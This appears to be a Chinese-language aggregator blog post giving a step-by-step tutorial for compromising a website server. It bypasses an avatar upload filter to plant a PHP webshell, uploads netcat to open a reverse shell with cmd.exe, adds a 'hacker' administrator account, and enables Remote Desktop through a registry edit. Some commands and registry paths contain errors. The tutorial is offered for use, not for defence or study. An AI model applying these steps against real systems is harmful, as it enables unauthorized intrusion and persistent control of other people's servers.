webshell后门上传流程

Posted

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了webshell后门上传流程相关的知识,希望对你有一定的参考价值。

1、将webshell.php的后缀名改成jpg等图片格式,即web.jpg。

2、打开相应网址,注册好账号后选择上传头像将web.jpg上传期间运行fiddler并设置断点,切换到raw界面,等到其提示相应请求代码后,将其代码段中第二个含有上传图片名称的代码改成web.php,之后继续响应请求。

3、此时已经成功把后门程序上传,将服务器反馈的代码中含有路径的部分复制粘贴到网站URL后面(注意将?php覆盖)刷新网页。

4、然后输入相应密码进入控制服务器端,将本机的nc.exe(netcut)上载到其C盘根目录下。

5、而后在自己本机打开cmd命令窗口找到nc.exe所在的目录并运行

6、这时已经进入nc.exe,在Cmd line:后输入nc -vv -l -p 8080进行监听

7、在控制服务器端选择Execute Command窗口,输入‘c:\nc.exe -vv [自身ip 端口] -e cmd.exe‘启动nc(绑定服务器端主机的cmd.exe在本机的相应端口)

8、然后就可以添加自己的账号作为管理员了,具体操作是:

(1) net user hacker 3836546 /add (添加用户)

(2) net user localgroup administrators test /add (添加到管理员组)

9、写入注册表:REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

(win2k,winxp,win2k3下开启远程桌面,不用重启)

10、有时还需要修改3389端口

[HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Terminal Server\Wds\Repwd\Tds\Tcp]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentContro1Set\Control\TenninalServer\WinStations\RDP-Tcp]

11、完成上述流程后,你就可以进入服务器端的主机进行操作


以上是关于webshell后门上传流程的主要内容,如果未能解决你的问题,请参考以下文章

云服务器可疑安全事件 警告:发现后门(Webshell)文件网站后门 手动处理流程

云服务器可疑安全事件 警告:发现后门(Webshell)文件网站后门 手动处理流程

云服务器可疑安全事件 警告:发现后门(Webshell)文件网站后门 手动处理流程

webshell

阿里云异常网络连接-可疑WebShell通信行为的分析解决办法

PHP安全之webshell和后门检测